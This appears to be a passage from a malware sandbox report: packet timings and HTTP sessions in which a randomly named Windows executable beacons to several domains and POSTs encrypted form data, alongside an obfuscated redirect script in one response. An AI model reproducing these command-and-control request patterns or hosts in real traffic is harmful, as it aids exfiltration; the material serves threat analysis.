                                                            Jul 3, 2024 17:41:12.740835905 CEST80498233.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:12.766969919 CEST80498233.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:12.766980886 CEST80498233.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:12.767292023 CEST4982380192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:12.771243095 CEST80498233.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:12.771473885 CEST4982380192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:12.773971081 CEST4982380192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:41:12.892338037 CEST80498233.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:41:20.923830032 CEST4982480192.168.11.2074.208.236.38
                                                            Jul 3, 2024 17:41:21.054687977 CEST804982474.208.236.38192.168.11.20
                                                            Jul 3, 2024 17:41:21.054894924 CEST4982480192.168.11.2074.208.236.38
                                                            Jul 3, 2024 17:41:21.068289042 CEST4982480192.168.11.2074.208.236.38
                                                            Jul 3, 2024 17:41:21.199048042 CEST804982474.208.236.38192.168.11.20
                                                            Jul 3, 2024 17:41:21.202608109 CEST804982474.208.236.38192.168.11.20
                                                            Jul 3, 2024 17:41:21.203102112 CEST804982474.208.236.38192.168.11.20
                                                            Jul 3, 2024 17:41:21.203268051 CEST4982480192.168.11.2074.208.236.38
                                                            Jul 3, 2024 17:41:21.210647106 CEST4982480192.168.11.2074.208.236.38
                                                            Jul 3, 2024 17:41:21.341415882 CEST804982474.208.236.38192.168.11.20
                                                            Jul 3, 2024 17:41:26.240961075 CEST4982580192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:26.409423113 CEST8049825142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:26.409610033 CEST4982580192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:26.425379038 CEST4982580192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:26.593741894 CEST8049825142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:27.581568956 CEST8049825142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:27.581583023 CEST8049825142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:27.581813097 CEST4982580192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:27.941791058 CEST4982580192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:28.971082926 CEST4982680192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:29.139942884 CEST8049826142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:29.140213966 CEST4982680192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:29.155994892 CEST4982680192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:29.324680090 CEST8049826142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:30.329432011 CEST8049826142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:30.329516888 CEST8049826142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:30.329770088 CEST4982680192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:30.659801006 CEST4982680192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:31.689239979 CEST4982780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:31.857737064 CEST8049827142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:31.857918978 CEST4982780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:31.874810934 CEST4982780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:31.874834061 CEST4982780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:31.874917030 CEST4982780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:32.043286085 CEST8049827142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:32.043303967 CEST8049827142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:32.043379068 CEST8049827142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:32.043472052 CEST4982780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:32.043494940 CEST4982780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:32.043580055 CEST8049827142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:32.043742895 CEST4982780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:32.043915987 CEST4982780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:32.212057114 CEST8049827142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:32.212075949 CEST8049827142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:32.212363005 CEST8049827142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:32.212369919 CEST4982780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:32.212425947 CEST4982780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:32.212455034 CEST4982780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:32.212488890 CEST8049827142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:32.212621927 CEST8049827142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:32.212621927 CEST4982780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:32.212811947 CEST4982780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:32.212903976 CEST4982780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:32.380796909 CEST8049827142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:32.380882978 CEST8049827142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:32.381016016 CEST8049827142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:32.381273985 CEST8049827142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:33.375262976 CEST8049827142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:33.375281096 CEST8049827142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:33.375500917 CEST4982780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:33.377933025 CEST4982780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:34.407365084 CEST4982880192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:34.576006889 CEST8049828142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:34.576159954 CEST4982880192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:34.589607954 CEST4982880192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:34.758238077 CEST8049828142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:35.763567924 CEST8049828142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:35.763588905 CEST8049828142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:35.763932943 CEST4982880192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:35.770667076 CEST4982880192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:41:35.939198971 CEST8049828142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:41:40.800242901 CEST4982980192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:41:40.937540054 CEST804982974.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:40.937755108 CEST4982980192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:41:40.953568935 CEST4982980192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:41:41.085834980 CEST804982974.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:41.092703104 CEST804982974.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:41.092715025 CEST804982974.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:41.092830896 CEST4982980192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:41:42.469700098 CEST4982980192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:41:43.499341011 CEST4983080192.168.11.2074.208.236.230
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49773 | 74.208.236.38 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 17:34:51.075294971 CEST | 520 | OUT | GET /9m56/?_B7=LxyxWrj8kri0gh&vX=wSNNrhltoDErcnEzxm9/w28Dp1eoX3XTDY+0HSDY/xjQqFM+lgiwoO0LpiVzuA8Bz+prc1fM5Kq2+VzXMkRPAHQ+fn8FfBllirngXHZ4XxgzDhA7JZPwDGY= HTTP/1.1
                                                            Host: www.costmoon.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Jul 3, 2024 17:34:51.209486008 CEST | 770 | IN | HTTP/1.1 404 Not Found
                                                            Content-Type: text/html
                                                            Content-Length: 626
                                                            Connection: close
                                                            Date: Wed, 03 Jul 2024 15:34:51 GMT
                                                            Server: Apache
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 49774 | 142.202.6.230 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 17:35:17.093039036 CEST | 788 | OUT | POST /hqcp/ HTTP/1.1
                                                            Host: www.6171nvuhb.rent
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.6171nvuhb.rent
                                                            Referer: http://www.6171nvuhb.rent/hqcp/
                                                            Content-Length: 199
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Ascii: vX=X5xwEotSV/RSS3LXuNj028r0i8vc/B0/yCf4GfFsEKu1yyag44SVgF+b2A/pYykOwfLwapKL67vlrbDrXkbkEx7A2aVAfmNbmEk7Rx184thn+y+ZkBPmMmWkKorkEsfB+IvtQktlyPOL2zU9RtD08VBohZiApbLvFTIKYY+gKb1XSafTk2elPIELgEJKFv/1XA==
Jul 3, 2024 17:35:18.260947943 CEST | 715 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Wed, 03 Jul 2024 15:35:18 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.11.20 | 49775 | 142.202.6.230 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 17:35:19.814647913 CEST | 1128 | OUT | POST /hqcp/ HTTP/1.1
                                                            Host: www.6171nvuhb.rent
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.6171nvuhb.rent
                                                            Referer: http://www.6171nvuhb.rent/hqcp/
                                                            Content-Length: 539
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Ascii: vX=X5xwEotSV/RSUn7XtqP0msr1tcvctB07yCT4GftaD8G1yQCgqpSVhF+b+g/scykHwfWDatCL6/HlquXrGEbjMR7HxaVBO2NRmEonR0V84bVn53iZgQPnLGWidYrlfcf1+ISYQghfy9SL1XY9StDz2lAgp5jW462hIiYpeo2+TKJJRqnNqwaWeKkSoXUaQeT4Cw0CekPQR1TGiCSp1jF2AVlKD/4TOdKspLTgtJZUszgc75aUVa6oOMjvTlCRJO6mYYCZ7PuGofQaBUdXj5xVpLpINVLZonbXeJJcUZg9bFEG0lUhm5qoYkGo4uDETgo82nqdLrjHiOGwTeZbqdAHT6UK0NhJqiQRy/xqbLZfbb4Kw+rSFCu1jHJvJv5GEQgm0HVdQiHnmQ+LIgopDfvBvjG9rbCWcAgynPR09MduvdjS8Txb0/VIkJnZW5l5iauu0CgPd0VSMF36X2ep1FVt8QNnkdnnSK0JFdb7OVByx+nZjjMFCjrj7sfjxflgAqLvl4J8ud5x5JLNnXHbwmM3Vvo=
Jul 3, 2024 17:35:20.974178076 CEST | 715 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Wed, 03 Jul 2024 15:35:20 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.11.20 | 49776 | 142.202.6.230 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 17:35:22.534113884 CEST | 6445 | OUT | POST /hqcp/ HTTP/1.1
                                                            Host: www.6171nvuhb.rent
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.6171nvuhb.rent
                                                            Referer: http://www.6171nvuhb.rent/hqcp/
                                                            Content-Length: 52927
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Jul 3, 2024 17:35:24.045949936 CEST | 715 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Wed, 03 Jul 2024 15:35:23 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.11.20 | 49777 | 142.202.6.230 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 17:35:25.248404980 CEST | 522 | OUT | GET /hqcp/?vX=a7ZQHf8WLvhHVBvdkZq5xuKGtafV4VgGgVvybuFCKLHzqS2zk6yuhV6s1hLkbw5zmPfcdtbcw9raqNmLcm/5LDv7+9F7BWl1gWJ1Gl5m9d8a+w3Gr0PmHHU=&_B7=LxyxWrj8kri0gh HTTP/1.1
                                                            Host: www.6171nvuhb.rent
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Jul 3, 2024 17:35:26.419451952 CEST | 1283 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Wed, 03 Jul 2024 15:35:26 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Data Ascii: 442<script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"3IBsVSr2xOACIVJU",ck:"3IBsVSr2xOACIVJU"})</script><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?800ccf274c3a593a3653e6acbfb00c7c"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script>...1--><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"KQ2cxFS69unN6J8D",ck:"KQ2cxFS69unN6J8D"})</script><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?be472e8744edb3816324a1183cdffac6"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script><script> var url = "https://aaa.za1.jecxs.cn/123.html"; var _0x0 = ["\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x68\x72\x65\x66"]; s [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.11.20 | 49778 | 74.208.236.230 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 17:35:31.783313990 CEST | 803 | OUT | POST /9qp3/ HTTP/1.1
                                                            Host: www.motorsportgives.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.motorsportgives.com
                                                            Referer: http://www.motorsportgives.com/9qp3/
                                                            Content-Length: 199
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Ascii: vX=UXwO7QGHJMKTZZMAx4f4SDrSVzDVc+O0KjDuFXnsy/ATnzalIsgZVEkVzKhX63JyezQysCxiN0y5nmFGcN5favY8ZV/8d21xjeGY/a0JKuAYF1TJIfzr2QguDFpm3CjzwKu9Pd5vEjmFPcs/8Wh9FZSz39sI7OQwjVR15hsxu4JC3EKvwkrimILwC+mi3XJhog==
Jul 3, 2024 17:35:31.921339989 CEST | 580 | IN | HTTP/1.1 404 Not Found
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Date: Wed, 03 Jul 2024 15:35:31 GMT
                                                            Server: Apache
                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.11.20 | 49779 | 74.208.236.230 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 17:35:34.479335070 CEST | 1143 | OUT | POST /9qp3/ HTTP/1.1
                                                            Host: www.motorsportgives.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.motorsportgives.com
                                                            Referer: http://www.motorsportgives.com/9qp3/
                                                            Content-Length: 539
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Jul 3, 2024 17:35:34.617757082 CEST | 580 | IN | HTTP/1.1 404 Not Found
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Date: Wed, 03 Jul 2024 15:35:34 GMT
                                                            Server: Apache
                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.11.20 | 49780 | 74.208.236.230 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 17:35:37.165724993 CEST | 9023 | OUT | POST /9qp3/ HTTP/1.1
                                                            Host: www.motorsportgives.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.motorsportgives.com
                                                            Referer: http://www.motorsportgives.com/9qp3/
                                                            Content-Length: 52927
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Jul 3, 2024 17:35:37.165774107 CEST | 3867 | OUT
Jul 3, 2024 17:35:37.297622919 CEST | 2578 | OUT
Jul 3, 2024 17:35:37.297801971 CEST | 19335 | OUT
Jul 3, 2024 17:35:37.297959089 CEST | 3867 | OUT
Jul 3, 2024 17:35:37.429631948 CEST | 6445 | OUT
Jul 3, 2024 17:35:37.429821968 CEST | 6445 | OUT
Jul 3, 2024 17:35:37.429929018 CEST | 1973 | OUT
Jul 3, 2024 17:35:37.565179110 CEST | 580 | IN | HTTP/1.1 404 Not Found
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Date: Wed, 03 Jul 2024 15:35:37 GMT
                                                            Server: Apache
                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.11.20 | 49781 | 74.208.236.230 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 17:35:39.849237919 CEST | 527 | OUT | GET /9qp3/?vX=ZVYu4nT3XPb6D5AnzJCZdD7dAyPNRNa3VWXdQVyX2eJo5TfLIuEqAXNcy5gjyltbfDYrkl4fema7mXoYWaQkTP4cU372CGZgosL9vb0GBN03EULPLqCD5DY=&_B7=LxyxWrj8kri0gh HTTP/1.1
                                                            Host: www.motorsportgives.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Jul 3, 2024 17:35:39.987484932 CEST | 770 | IN | HTTP/1.1 404 Not Found
                                                            Content-Type: text/html
                                                            Content-Length: 626
                                                            Connection: close
                                                            Date: Wed, 03 Jul 2024 15:35:39 GMT
                                                            Server: Apache
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.11.20 | 49782 | 199.59.243.226 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 17:35:45.371922016 CEST | 785 | OUT | POST /c7lp/ HTTP/1.1
                                                            Host: www.orthonow.live
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.orthonow.live
                                                            Referer: http://www.orthonow.live/c7lp/
                                                            Content-Length: 199
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Ascii: vX=NbF0gQ4r3+CKKMvRVXs/9lBP2kc044TNNzzbHAaOpVZQJBT9K9uNibglKozbm4/Zsg0CEUYhjZM0WrmGmEZSxu1pydiMXlYb6XNF3ErC2txryzoBnf6fNs+FbXZGhG3hwZJARugBP8z5agXoY4tFPTMyalG/c06R+EIgE/2dfeaM0JUBQ5+QimZUJ9EfNOpamA==
Jul 3, 2024 17:35:45.512809992 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                            date: Wed, 03 Jul 2024 15:35:45 GMT
                                                            content-type: text/html; charset=utf-8
                                                            content-length: 1118
                                                            x-request-id: ca35958c-0418-4497-b6af-3fa6909b516c
                                                            cache-control: no-store, max-age=0
                                                            accept-ch: sec-ch-prefers-color-scheme
                                                            critical-ch: sec-ch-prefers-color-scheme
                                                            vary: sec-ch-prefers-color-scheme
                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vFk822k414W4LEy0WueI+VTSidoXo7JWiQQpNL4wdqrjXci3A5YIfndgTYUPMnSpB446Y/4K6+3mggQkVkyo4g==
                                                            set-cookie: parking_session=ca35958c-0418-4497-b6af-3fa6909b516c; expires=Wed, 03 Jul 2024 15:50:45 GMT; path=/
                                                            connection: close
                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vFk822k414W4LEy0WueI+VTSidoXo7JWiQQpNL4wdqrjXci3A5YIfndgTYUPMnSpB446Y/4K6+3mggQkVkyo4g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
Jul 3, 2024 17:35:45.512824059 CEST | 518 | IN
                                                            Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiY2EzNTk1OGMtMDQxOC00NDk3LWI2YWYtM2ZhNjkwOWI1MTZjIiwicGFnZV90aW1lIjoxNzIwMDIwOTQ1LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cub3J0aG9ub3cubGl2ZS9


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.11.20 | 49783 | 199.59.243.226 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 17:35:48.040883064 CEST | 1125 | OUT | POST /c7lp/ HTTP/1.1
                                                            Host: www.orthonow.live
